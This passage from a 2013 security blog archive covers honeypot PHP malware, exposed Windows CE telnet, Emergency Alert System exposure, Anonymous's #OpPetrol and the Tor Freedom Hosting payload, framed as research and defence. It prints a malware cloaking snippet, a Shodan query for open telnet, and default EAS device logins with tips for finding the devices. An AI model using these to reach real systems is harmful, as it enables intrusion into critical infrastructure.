Clearly, some embedded Windows developers have accidentally left this setting enabled prior to shipping their devices. One thing which really stands out is that some of the vulnerable systems are KVMs, meaning that should the KVM be compromised, the attacker will have control of all connected systems, and be able to install a keylogger to capture all usernames/passwords. Since KVMs do not typically have antivirus installed, this activity may never be noticed. As I dive deeper into Shodan, I hope to bring more interesting vulnerabilities like this one to light. Stay tuned!
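As an added example (not code from the post or from Microsoft), here is a small Python audit that reads a .reg-style export taken from a Windows CE image, reports whether the debug telnet server would accept connections with no password, and prints the corrected key values a developer should ship. The sample export is constructed, and treating a missing UseAuthentication value as "authentication required" is an assumption.

```python
"""Audit a Windows CE registry export for the unauthenticated telnet setting.

Constructed example: parses the HKEY_LOCAL_MACHINE\\COMM\\TELNETD key from a
.reg-style text dump and classifies the telnet daemon configuration.
"""
import re

TELNETD_KEY = r"HKEY_LOCAL_MACHINE\COMM\TELNETD"

# Constructed .reg export as it might be pulled from a device image (sample input, not a real device).
SAMPLE_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\COMM\TELNETD]
"UseAuthentication"=dword:00000000
"IsEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\COMM\HTTPD]
"IsEnabled"=dword:00000000
"""


def parse_reg(text):
    """Return {key_path: {value_name: value}} for a .reg-style export.
    dword values are decoded to int; any other value is kept as its raw string."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        if current is None:
            continue
        m = re.match(r'^"?([^"=]+)"?=(.*)$', line)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        if value.lower().startswith("dword:"):
            value = int(value[6:], 16)
        keys[current][name] = value
    return keys


def assess_telnetd(keys):
    """Classify the telnet daemon configuration.
    Returns one of: 'absent', 'disabled', 'authenticated', 'unauthenticated'."""
    vals = None
    for path, v in keys.items():
        if path.upper() == TELNETD_KEY.upper():
            vals = v
            break
    if vals is None:
        return "absent"
    # IsEnabled turns the debug telnet service on; UseAuthentication=0 removes the
    # login prompt. A missing UseAuthentication is assumed to mean a login is required.
    if vals.get("IsEnabled", 0) == 0:
        return "disabled"
    if vals.get("UseAuthentication", 1) == 0:
        return "unauthenticated"
    return "authenticated"


def hardened_telnetd(enable=False):
    """Registry fragment to ship instead: authentication on, and the debug
    telnet service off unless it is explicitly needed."""
    return (
        f"[{TELNETD_KEY}]\n"
        '"UseAuthentication"=dword:00000001\n'
        f'"IsEnabled"=dword:{1 if enable else 0:08x}\n'
    )


if __name__ == "__main__":
    state = assess_telnetd(parse_reg(SAMPLE_REG))
    print("telnetd:", state)
    if state == "unauthenticated":
        print("Replace with:\n" + hardened_telnetd())
```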
1. http://www.shodanhq.com/search?q=%22Windows+CE+Telnet%22+%22Pocket+CMD%22
2. http://blogs.msdn.com/b/cenet/archive/2004/09/30/the-ce-telnet-server.aspx
3. http://3.bp.blogspot.com/-ZwyNvLlKFuQ/UamSlyff-cI/AAAAAAAAAdU/v7z4Ib-KKXY/s1600/wincetelnet.png

3.6.3

New PHP Malware Source Available for Analysis (2013-06-09 00:17)

After about a month of running my Glastopf honeypot, I've started getting some hits. You can take a look at the files I've collected (including deobfuscated code) over at my [1]malware analysis site. One thing which stands out to me in some of the malware is that it intentionally hides from being cached by search engines using the following code:

    <?php
    // Return a fake 404 to search engine crawlers so the malicious page is never indexed or cached.
    if (!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');
        if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
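One defender-side way to spot this cloaking in your own web server logs, as an added example that is not code from the post or the honeypot: a page that answers 200 to browsers but 404 to every crawler user agent stands out once the access log is grouped by path. The log lines, hosts and paths below are constructed.

```python
"""Detect search-engine cloaking from combined-format access logs.

Constructed example: the PHP snippet above answers 404 only to crawler user
agents, so a cloaked page shows up in the server's own logs as a path that
returns 2xx to ordinary browsers and 404 to every crawler.
"""
import re
from collections import defaultdict

# Same crawler names the malware matches on.
BOT_PATTERN = re.compile(r"Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler", re.I)

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (fictional clients and paths).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jun/2013:00:01:12 +0000] "GET /wp-content/uploads/x.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/21.0"
66.249.66.1 - - [09/Jun/2013:00:02:40 +0000] "GET /wp-content/uploads/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.1.1 - - [09/Jun/2013:00:03:02 +0000] "GET /wp-content/uploads/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.0.113.9 - - [09/Jun/2013:00:04:33 +0000] "GET /index.php HTTP/1.1" 200 8810 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/21.0"
66.249.66.1 - - [09/Jun/2013:00:05:10 +0000] "GET /index.php HTTP/1.1" 200 8810 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.1 - - [09/Jun/2013:00:06:10 +0000] "GET /old-page.html HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.9 - - [09/Jun/2013:00:07:33 +0000] "GET /old-page.html HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/21.0"
"""


def parse_log(text):
    """Yield one dict per parseable combined-format line; status is an int."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            yield entry


def find_cloaked_paths(entries):
    """Return {path: (human_statuses, bot_statuses)} for paths that serve 2xx to
    ordinary clients while every crawler request gets a 404.
    A page that is 404 for everyone (a genuinely missing page) is not flagged."""
    human = defaultdict(set)
    bots = defaultdict(set)
    for e in entries:
        bucket = bots if BOT_PATTERN.search(e["ua"]) else human
        bucket[e["path"]].add(e["status"])
    suspicious = {}
    for path in set(human) & set(bots):
        if any(200 <= s < 300 for s in human[path]) and bots[path] == {404}:
            suspicious[path] = (sorted(human[path]), sorted(bots[path]))
    return suspicious


if __name__ == "__main__":
    for path, (h, b) in find_cloaked_paths(parse_log(SAMPLE_LOG)).items():
        print(f"possible cloaking: {path} browsers={h} crawlers={b}")
```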

See something else worth discussing? Post it here!


1. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/www-honeypot/

3.6.4

Come Join Me On @ThreatConnect and Share Cyber Threat Intelligence (2013-06-13 19:46)

[1]ThreatConnect is a new site providing the ability to share intelligence on Advanced Persistent Threats and other hacking incidents/perpetrators. I have recently set up an account on the site, and have started adding incidents from my honeypot. ThreatConnect allows recording and sharing of threat indicators and incidents, including hosts, file hashes, malicious email addresses, and more!

[2] Are you interested in exchanging data? If so, please sign up for an account with ThreatConnect, then send me a connection invite. The email address you'll need to send the invite is in the screenshot below.

[3]
1. https://threatconnect.com/
2. http://1.bp.blogspot.com/-6-S5nyiICys/UbpZSDx_L1I/AAAAAAAAAd0/7Gv5HcvEN78/s1600/indicators.png
3. http://1.bp.blogspot.com/-R-zEVtjjk-Y/UbpY6k5uA1I/AAAAAAAAAds/HBC0bJoOxPc/s1600/connectinvite.png

3.6.5

Anonymous #OpPetrol Most Epic #Fail Yet - Full Analysis Of Results (2013-06-21 10:47)

Looking at the damage (and I use that term very loosely) done as part of OpPetrol, Anonymous support by actual hackers is fading fast. Let's take a look at the original [1]target list of what was supposed to be attacked.

United States, Canada, United Kingdom, Israel, Saudi Arabia (only Government), China, Italy, France, Germany, Kuwait (only government) and Qatar (only government)

Hackers News Bulletin released a live list of all the damage done as part of OpPetrol, and it's [2]a rather short list. Let's run through the list and look to see if Anonymous actually succeeded in their operation. Better grab some popcorn, this is going to be quite entertaining.
[3]

First (and probably most notable) on the list is a Saudi Arabia government website: http://www.allaithged.gov.sa/doc/images/announce/ This appears to be a local government website in southwest Saudi Arabia. However, the main landing page itself was not defaced, but instead a hidden webpage was placed, most likely days in advance. Trend Micro has a great writeup on how these timed attacks [4]really aren't timed at all. Anonymous essentially cheated with their attack on the Saudi government.

[5] Next on the list is multiple Indonesia government websites. However, Indonesia wasn't on the original target list. The sites were probably attacked last minute in an effort to try to declare success.

[6] Then there are 142 random websites which most people have never heard of. These range from a hotel in the United Arab Emirates (country not on target list) to several home improvement websites in Denver, Colorado. In fact, the only oil related website I see on the list is RTLubricants.com, a Pakistan (country not on target list) automotive lubricant manufacturer.

[7] Peoplesbankruptcy.com was indicated as a special hack, whatever that means.

[8] A pastebin ([9]http://pastebin.com/L9YPvFn5) was released with a list of email addresses and names associated with Aramco Oil Company. But Google searches show most of this information is available publicly, and was most likely obtained using Maltego. Also, examining the list further, Aramco sure does have a lot of people working for them born on January 1.

[10] A pastebin ([11]http://pastebin.com/qP00xctu) was released with usernames and passwords of Total oil company employees. This may actually be the only legitimate attack as part of OpPetrol, but was most likely done long before June 20. UPDATE: I have been informed by an anonymous source that this data is fake, and that only two of the people on the list actually work for Total oil company. No real passwords are on the list.

[12] Several posts on Facebook are mentioned, but these posts no longer exist, and can not be verified in authenticity.

[13] Random email addresses of Saudi Arabia and Germany ([14]https://privatepaste.com/d4db09dd6e) were dumped from a database somewhere, but no password info is included, and all the email addresses are free accounts such as Yahoo, Gmail, or Hotmail.

[15] A possible cross site scripting exploit was released against Pennzoil.com, which really seems trivial since it wasn't exploited to actually deface the site, or leak any information.

[16] And finally, Tunisian Hckers Team and XhckerTN claimed to hack "USA Citizen Full Information". This hack is such a fail that it deserves its own EPIC FAIL icon. First pastebin ([17]http://pastebin.com/Cq0S95UN) no longer exists. It might have actually contained some real personal information. The second pastebin ([18]http://pastebin.com/EVZjKnjB) contains a list of random IP addresses.

[19] The third pastebin ([20]http://pastebin.com/c75gC2ia) contains even more nonsensical data - a list of user-agents (web browser versions), more IP addresses, and the reverse DNS entries for those IP addresses. This pastebin is extremely impressive in that Anonymous has finally figured out how to read a web server log. In conclusion, the above incompetency shows just how few technically minded members of Anonymous remain. Most of what's left are script kiddies who don't even understand how the Internet works, and think that posting IP addresses and browser versions is equivalent to having dox on everyone in the USA. #OpFail
1. https://sites.google.com/site/caffsec/previous-threat-assessments/oppetrol---june-20
2. http://hackersnewsbulletin.com/2013/06/1911.html
3. http://2.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeI/nxRrG1oQgAk/s1600/Fail.png
4. http://blog.trendmicro.com/trendlabs-security-intelligence/failed-opusa-attacks-show-how-hackers-operate/
5. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png
6. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png
7. http://3.bp.blogspot.com/-pxibfb4g_tw/UcRiUCsFqVI/AAAAAAAAAeQ/_Th2mii3jMo/s1600/WTF.png
8. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png
9. http://pastebin.com/L9YPvFn5
10. http://2.bp.blogspot.com/-os-z3MqWmtE/UcRw9NXMQUI/AAAAAAAAAfM/WGzngkEY4Kw/s1600/Fail.png
11. http://pastebin.com/qP00xctu
12. http://4.bp.blogspot.com/-pxibfb4g_tw/UcRiUCsFqVI/AAAAAAAAAeU/IGNce_k7Icw/s1600/WTF.png
13. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png
14. https://privatepaste.com/d4db09dd6e
15. http://4.bp.blogspot.com/-pxibfb4g_tw/UcRiUCsFqVI/AAAAAAAAAeU/IGNce_k7Icw/s1600/WTF.png
16. http://4.bp.blogspot.com/-SX3onvFU9IM/UcRjaUOpAyI/AAAAAAAAAeg/xu2t-0v86qw/s1600/EpicFail.png
17. http://pastebin.com/Cq0S95UN
18. http://pastebin.com/EVZjKnjB
19. http://1.bp.blogspot.com/-mTBDkYEp2js/UcRlFdhC7tI/AAAAAAAAAe0/vLpzwM9vFpk/s1600/ipaddresses.png
20. http://pastebin.com/c75gC2ia


3.6.6

Coming Changes and Improvements to Caffeine Security Blog (2013-06-25 17:00)

Over the past year I've gathered a lot of logs and malware information from my honeypot. The biggest challenge has always been - what to do with the information once I gather it. I've recently started sharing the more significant events through ThreatConnect, but really feel some of this data should be shared with a wider audience. I'm thinking of implementing a couple things:

- Tracking of threat indicators through my Malware Analysis Google Code site's Wiki
- Tracking of threat attack patterns through Google Calendar
- ...?

Something else I'm considering is building a Linux Rescue Disk for analysis and remediation of malware infected Windows systems. All included software would be 100% open source. Not only would I build this for my own use, but I'd also make an ISO available free of charge. I know there are distros out there already aimed at doing this, but I'm really considering making my own Caffeine Security branded distro. Do you have any recommendations on additional methods of using the data I've collected? Or recommendations for my Linux rescue disk? If so I'd love to hear from you. You can comment below or email me: CaffSecBlog <at> Gmail <dot> com

3.6.7

Recorded Future Announces Cyber Threat Intelligence Application (2013-06-28 20:42)

Recorded Future recently announced the release of their [1]Cyber Threat Intelligence Application. The new app adds a set of real-time trend signals for attackers, TTPs, targets, and hacktivist operations. You can see what's trending for each of the four categories, brush across entities to see cross-linkages, and drill down on interesting items to dig in and analyze. The application presents a real-time dashboard of cyber threats, and allows filtering based upon threat, target, operation, or any other criteria. One of the staff from Recorded Future was kind enough to demo the application for me today, and I am very impressed. You can get a brief glimpse of the app through the [2]YouTube video.

For examples of the data available, check out my [3]Threat Watch site, which is powered by Recorded Future.
1. https://www.recordedfuture.com/how-people-use-recorded-future/cyber-security/
2. http://www.youtube.com/watch?v=px44vi3gJKA&feature=youtu.be
3. https://sites.google.com/site/caffsec/current-cyber-threats

3.6.8

Guest Post: Hackers Breakfast: TrainACE and n2grate Team Up for a Free Hacking Seminar (2013-06-28 20:58)

The following is a Guest Post from TrainACE. I attended the last Hackers Breakfast, and found it a very informative training seminar. You can read my thoughts on the last Hackers Breakfast [1]here.

TrainACE and their cyber security training extension, Advanced Security, are announcing another installation in their series of free hacking seminars, dubbed Hackers Breakfast. Previously having planned an event with FireEye, they have teamed up with [2]n2grate Government Technology Solutions this time around to host the latest installation featuring multiple speakers and training demonstrations. Blue Coat and Solera Networks will have Subject Matter Expert technicians talk about mission assurance technologies and web-based security. A difference from this Hackers Breakfast and the previous event in the series is the inclusion of live demonstrations. The session for product demonstrations will feature kiosks related to advanced threat protection from Blue Coat, Netronome, and Packet Shaper. Event sponsor Solera Networks will have an exhibit for big data security intelligence and analytics. The seminar itself will start off with a presentation on web-based security and its significance to mobile workers, social networking, and threat protection. The speakers will address web-based security on a number of devices, covering users who own desktops, laptops, and mobile platforms. Next up on the itinerary will be the break for kiosks. For the rest of the seminar, a session will cover how the Department of Defense and other federal agencies should handle mission-critical program security. The seminar will close with another period allotted to additional product and training demonstrations. However, the opportunity is only available to Government and Department of Defense employees and the event is capped at 70 registrants. Sign up immediately in order to reserve a place at this leading edge event! Hackers Breakfast will be held at TrainACE in Ashburn, VA on July 24, 2013. The event opens with registration and breakfast at 8:00AM and will finish at 12:30PM. Learn more and register online here: [3]Hackers Breakfast The FREE Hacking Training Seminar Series by TrainACE.
1. http://caffeinesecurity.blogspot.com/2013/04/hackers-breakfast-absolutely-great.html
2. http://www.n2grate.com/
3. http://www.hackersbreakfast.com/

3.7

July

3.7.1

A Confession to my Twitter Users - And Thank You (2013-07-01 23:18)

I have a confession to all my Twitter users. I've been using you all. On my Twitter feed ([1]https://twitter.com/CaffSec) you will see automated posts of news and new exploit code from Pastebin. These automated posts are generated using RSS feeds and Dlvr.it. Truth is, I don't have time to read all of those articles and exploits I'm posting. Instead, I've successfully crowdsourced my security news - I read what you reply to, favorite, and retweet. After all, if you found it interesting and worth reading, I should probably read it as well.

As I approach 2,000 followers on Twitter, I just want to say thank you to each and every one of you who follow me. You help me more than you know. Thanks to you all, I know what stories are important to read. It's taken two years to get here, and I've gone a long way from my original 5 Twitter followers. Best of all, I've even gotten back in touch with a few old friends, and made some new ones in the process. So to each and every one of my Twitter followers, thank you for following me and interacting with my tweets!

1. https://twitter.com/CaffSec

3.7.2

Android Pacemaker Exploit Kit Released In Memory of Barnaby Jack (2013-07-28 04:13)

In a disturbing move, a hacker flying under the flag of Anonymous has released an [1]Android application which [2]can possibly kill someone in memory of Barnaby Jack. Barnaby Jack was scheduled to deliver a demonstration of remote pacemaker hacking at [3]Black Hat. The application, named PaceXploit, allows any user with an Android cellphone to search for nearby vulnerable pacemakers and perform remote diagnostics, possibly killing the person.

[4]

Screenshot of the app's warning message.



[5] Screenshot of the app scanning for vulnerable devices. Give someone a Heart Attack? There's an app for that.
1. http://anonymousmedia.org/paste/3ntHvB0s
2. http://pastebin.com/BQwpLtN5
3. http://www.reuters.com/article/2013/07/27/us-hacker-death-idUSBRE96P0K120130727
4. http://1.bp.blogspot.com/-GCJl0tZLmCk/UfTRSmFMcSI/AAAAAAAAAhE/p35BVGwGbj4/s1600/2013-07-28_03-31-11.png
5. http://1.bp.blogspot.com/-jbmJtYd9xWg/UfTRXfkBnDI/AAAAAAAAAhM/DjZ5JHm58kI/s1600/2013-07-28_03-31-28.png


3.7.4

PaceXploit - The Truth Revealed, and an Apology (2013-07-28 23:11)

I received a message today from an IOActive staff member regarding the PaceXploit app. I have pulled the original blog post, and want to apologize if this was insensitive of me. I was going to wait a few days to reveal this, but as I have been contacted by IOActive, I am going ahead and revealing the truth. The truth is, I created the PaceXploit app. It does nothing. It has no capability to locate or connect to medical devices. The entire app was a social experiment by several of us in the security community to see how many people would actually press the button to use an Android app which could possibly remotely kill someone. It was insensitive to include Barnaby's name, and I really do apologize for that. To be clear, I only wrote the app and collected the usage data through Google Analytics, with the intention of group review and analysis of the data. Barnaby's name was not included in the app itself. Others were responsible for the app's distribution and promotion. Any questions or concerns regarding the distribution or promotion, I suggest be sent to ihazcandy on Twitter. I purposely left my name inside the code for the app, so that any serious security researcher analyzing it could quickly identify its source. As such, I removed my blog post as soon as a researcher from IOActive contacted me and requested I do so. To make things clear, my intention was never to try and gain fame or increased readership for my blog. If I had intended that, I would have made the app redirect to my blog after running. Instead, I had the app redirect to a generic error page. My intention was merely to gather data on how many people would ignore the warnings and proceed to run the diagnostic against a pacemaker, potentially killing someone. This was a spur of the moment decision, and I regret that the group didn't put more thought into it, and no one should have used a real world tragedy to perform research. Unfortunately, while I have deleted the original blog post, I cannot undo what has been done. My research into the ethics of how such an exploit would be used was in itself not in accordance with the ethical standard I normally hold when performing research. Unfortunately, I did not design the app to collect install statistics, only statistics on how many people would run the app to completion. However, I'm very disturbed by the fact that a single person even downloaded and installed the app. It could have very easily been malicious, and I applaud those within the community who actually questioned and analyzed the app. Those who downloaded and installed the app should seriously reconsider these actions in the future, as they are inherently dangerous. I want to personally express my condolences to IOActive and Barnaby Jack's family. I apologize once again if these actions were insensitive and if this has caused them any additional grief. That was never our intention.

[1] Statistics for those who used the app to run a diagnostic since 7/28/2013 at 3 AM despite multiple warnings it could kill

P.S. For the record I have no affiliation with Anonymous. If you don't believe me, please review [2]previous posts. This post has been updated to clarify the distribution and promotion methods of the app in question.
1. http://1.bp.blogspot.com/-8ykSW7swD2E/Ufg7P1lThUI/AAAAAAAAAhw/biRH9tXnNlU/s1600/pacemaker-stats.png
2. http://caffeinesecurity.blogspot.com/search/label/Anonymous

3.7.5

How Vulnerable Is The Emergency Alert System? (2013-07-29 19:44)

I'm sure by now everyone has heard about the Emergency Alert System [1]Zombie Attack incident. IOActive even released a [2]security advisory about the vulnerabilities with DASDEC Emergency Alert System digital alert systems. However, the incident raises further concerns, such as who in their right mind hooked up the Emergency Alert System to the Internet in the first place? If someone wanted to hack the Emergency Alert System, first they would need to know what hardware/software is out there. (Un)fortunately the FCC has already done part of this research and published a [3]vendor list. I started looking at the approved companies, and quickly became horrified by what I found. Looking at the DASDEC (the system with the original vulnerability), I quickly found the system's [4]manual. Just glancing through the manual, I immediately found a screenshot showing the full URL used to access the DASDEC web interface. This can easily be used to generate a Google dork.

[5] DASDEC II Login Screen (from user manual)

Below the screenshot, the default login of Admin/dasdec is ever so conveniently displayed. Hopefully, DASDEC is the exception to the rule, and none of the other EAS systems are so easily accessible...right? The next system I looked at was EASyCAP from Trilithic. Trilithic also makes their [6]manuals available online. Sure enough, checking the EASyCAP manual, this product too has a web interface. This interface also has a default username and password.

[7] EASyCAP User Account Interface (from user manual) Trilithic also provides the URL for their service, making a Google dork easy as well.

[8] EASyCAP Access Instructions (from user manual)

The third EAS system I picked to examine is the SAGE ENDEC, which also has a [9]manual available online. Sure enough, this EAS system also has a web interface, and can be accessed using the default login of Administrator/1111. Looking through the feature list of other EAS systems on the FCC's list, it appears that every single EAS can be accessed using a web browser. This is quite honestly frightening. Something important to note here is that I've never used the Emergency Alert System, ever. I'd never heard of any of these systems until I started researching today. And yet, within a couple hours, I already know that all of the systems can be accessed over a web browser, by using publicly available data. Any systems which are publicly accessible over the internet are most likely very lax in security, and administrators may not even know they're publicly accessible. At this point, I'm speechless. How could a system which is so critical to emergency communications in the United States be so vulnerable? Did no one blink an eye at the security implications of having the Emergency Alert System controllable by a web browser? To mitigate the possibility of someone accessing the Emergency Alert System, network administrators should immediately verify that their EAS equipment is not accessible over the public internet by reviewing their firewall rules. I suspect this post may generate some high traffic, so if you'd like to contact me directly about it for some reason please email: caffsecblog <at> gmail <dot> com.
1. http://nakedsecurity.sophos.com/2013/07/10/did-brainless-flaw-in-us-emergency-alert-system-lead-to-epic-zombie-attack-warning/
2. http://www.ioactive.com/pdfs/IOActive_DASDEC_vulnerabilities.pdf
3. http://transition.fcc.gov/pshs/services/eas/vendors.html
4. http://www.digitalalertsystems.com/pdf/DASDEC_II_manual.pdf
5. http://4.bp.blogspot.com/-8lVxKcBDqU8/Ueh2KtDSnZI/AAAAAAAAAf0/qKlkN3yEGGQ/s1600/dasdec.png
6. http://eas.trilithic.com/Documents/Manuals/index.html
7. http://4.bp.blogspot.com/-rUKXCUsqveM/Ueh4pM4-2_I/AAAAAAAAAgg/zpS0y-22xbs/s1600/easycap.png
8. http://1.bp.blogspot.com/-zQLShD1Z4tc/Ueh6GGXzFvI/AAAAAAAAAgw/43rPODg1zkg/s1600/EASyCAP-2.png
9. http://www.sagealertingsystems.com/support-manuals.htm

3.7.6

DISA Gold Disk FOIA Request Sent (2013-07-30 10:55)

I have sent a FOIA request to DISA for public release of the DISA FSO Gold Disk. It is my hope that this request will be rather painless, and that DISA will release all requested materials. If/when DISA does release the requested materials, I will establish an open source project on either SourceForge or Google Code for continued development of the Gold Disk. My letter is below. I should receive a response within 30 days.

Hello,

I am writing to you to request public release of the following:
- DISA FSO Gold Disk binaries
- DISA FSO Gold Disk source code
- DISA FSO Gold Disk developer documentation
- DISA FSO Gold Disk user/administrator manuals

Per http://iase.disa.mil/stigs/index.html

The DISA FSO Windows Gold disk tool provides an automated mechanism for compliance reporting and remediation to the Windows STIGs. The FSO Windows Gold Disks are an unlicensed tool developed by the FSO, the use of this tool is completely at the users own risk. Currently, the Gold Disk supports Windows XP, Windows Vista, Windows 2003, Windows 2008 R1. There are no plans to develop Gold Disks for future technologies or products, FSO will utilize the SCAP standards for compliance reporting for Windows 7.

Since the tool is unlicensed and developed by FSO, that puts the tool in Public Domain. Furthermore, the DISA FSO Gold Disk is no longer supported for use within DoD, and development has ceased, meaning the tool is no longer in use within the DoD.

This tool could be of great use to the private sector, and would help increase the security of our nation.

I understand that the DISA Gold Disk does contain IAVM information which is still FOUO. As such, I am agreeable to this information being sanitized prior to public disclosure.

Since this is a FOIA request for public interest, I would like to request that any fees be waived.

I look forward to your response.

Thanks,
Ken Buckler
Caffeine Security

3.7.7

URGENT! McAfee VirusScan Artemis False Positives! (2013-07-31 20:32)

I've been tipped off that McAfee VirusScan's Artemis Global Threat Intelligence is triggering numerous false positives. I do not have details on this (and if anyone has further details please post them), but McAfee has made the following KB article available: [1]https://kc.mcafee.com/corporate/index?page=content&id=KB78993 According to sources online, Artemis is [2]deleting numerous files making machines [3]inaccessible.
1. https://kc.mcafee.com/corporate/index?page=content&id=KB78993
2. http://www.404techsupport.com/2013/07/mcafee-artemisgti-false-positive-taking-down-pcs/?utm_source=dlvr.it&utm_medium=twitter
3. https://twitter.com/OASec1/status/362731623743098880

3.8

August

3.8.1

@th3j35t3r Domain Seized by DHS, Arrested at Blackhat? (2013-08-02 14:24)

UPDATE: It appears that jesterscourt.cc is restored. This appears to all have been a hoax on the Jester's part.

It has been brought to light that The Jester's domain, jesterscourt.cc, has been seized by the Department of Homeland Security (DHS). At the same time, Jester has gone dark on Twitter, with no new posts since [1]July 31. Jester had already made [2]multiple [3]posts showing that he was attending the Blackhat conference in Las Vegas. Does this mean Jester has been arrested at the Blackhat conference? This would explain the sudden seizure of his domain, and why his Twitter feed has gone dark. This wouldn't be the first time a hacker was arrested at a Las Vegas conference. In 2001 a Russian hacker was [4]arrested at DEFCON.

[5] It's important to note that Jester has before faked his own retirement in the Smedley Manning [6]incident.
1. https://twitter.com/th3j35t3r/status/362649015080329216
2. https://twitter.com/th3j35t3r/status/362430003029344256
3. https://twitter.com/th3j35t3r/status/362605780203089922
4. http://usatoday30.usatoday.com/tech/news/2001-07-17-russian-hacker.htm
5. http://3.bp.blogspot.com/-g9xQqjw-R5w/Ufv2eCBE5dI/AAAAAAAAAiA/RcLOxwDLLZQ/s1600/j-dhs.png
6. http://news.softpedia.com/news/th3j35t3r-Is-Back-Claims-Smedley-Manning-Is-Bluffing-270400.shtml

3.8.2

Blog Updated to Include Shodan Searches and Free Security Resources (2013-08-02 23:10)

I've set up a couple experimental IFTTT recipes to automatically post new Shodan searches to my blog, as well as post new Cyber Security resources as they become available. If you notice it malfunctioning, please let me know via Twitter. This is a brand new feature, and I hope it works well.

3.8.3

New Shodan Search: Trilithic (2013-08-02 23:36)

A New Shodan Search is now saved on SHODAN - Recently Saved Searches
Title: Trilithic
Description: Trilithic creates cable and satellite equipment for diagnostics and maintenance, including Emergency Alert System equipment.
URL: [1]http://www.shodanhq.com/?q=Trilithic
1. http://www.shodanhq.com/?q=Trilithic

3.8.4

Massive TOR Hidden Service Compromise (2013-08-04 13:59)

It was [1]announced today on Twitter that one of the major hidden services hosting companies has been delivering [2]malicious content and the hosted sites were [3]shut down after a [4]raid by law enforcement. Supposedly, among the compromised services is TorMail, which provides anonymized email services. If TorMail has been compromised, this could have broader reaching effects, including giving the FBI and Interpol the ability to directly access associated accounts outside of Tor hidden services. It would then be easy for the authorities to request from associated websites a log of associated IP addresses. This spells bad news for anyone who uses Tor for illegal purposes, and a major win for the law enforcement community. NOTE: You can view deobfuscated versions of the malicious code at my Malware Analysis Google Code site: [5]https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/
1. http://www.twitlonger.com/show/n_1rlo0uu
2. http://pastebin.mozilla.org/2776374
3. https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting
4. http://www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html
5. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/

3.8.5

What the FBI probably knows about Tor Users (2013-08-05 00:31)

[1]Vlad Tsyrklevich has posted an excellent analysis of the [2]payload delivered by the Tor Browser Bundle exploit. This payload was delivered to every Tor Browser Bundle user who visited a Freedom Hosting hosted Tor Hidden Service, including Tormail. According to Vlad, the exploit sends the hostname and MAC address of the local system to 65.222.202.54 over HTTP, then crashes.

So, what can the FBI do with this information? Well, they now have a record of what systems were visiting all sites on Freedom Hosting. It is also safe to assume that the FBI now has all emails and logs stored by Tormail. The Tormail emails can be an excellent data mine without any additional info. Many Tormail users could have possibly revealed sensitive information over Tormail, including their name and home address, especially if using Tor to order illicit goods or services.

However, the hostname and MAC address can also be useful. For example, the FBI can use the MAC address to subpoena a computer manufacturer to find out who purchased the computer. They can then use the hostname to verify they have the right person. For example, let's say the FBI got a hostname of DOE-PC and a MAC address matching a Dell laptop. The FBI contacts Dell with a subpoena: "Did you sell a computer to someone named Doe with MAC address XX:XX:XX:XX?" Dell can send them the transaction information, including home address.

This is a big win for law enforcement worldwide, and should help to end some of the illegal activities occurring on Tor. Just remember kiddies, there is no such thing as private on the Internet. Not even on Tor.

NOTE: You can review the deobfuscated JavaScript at my Malware Analysis Google Code site: [3]https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/
1. https://twitter.com/vlad902
2. http://tsyrklevich.net/tbb_payload.txt
3. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/TorFreedomHosting/

3.8.6

Buyers Guide: Selecting an SSL Management System (2013-08-07 15:47)

The following is external content provided as a free resource for blog readers.

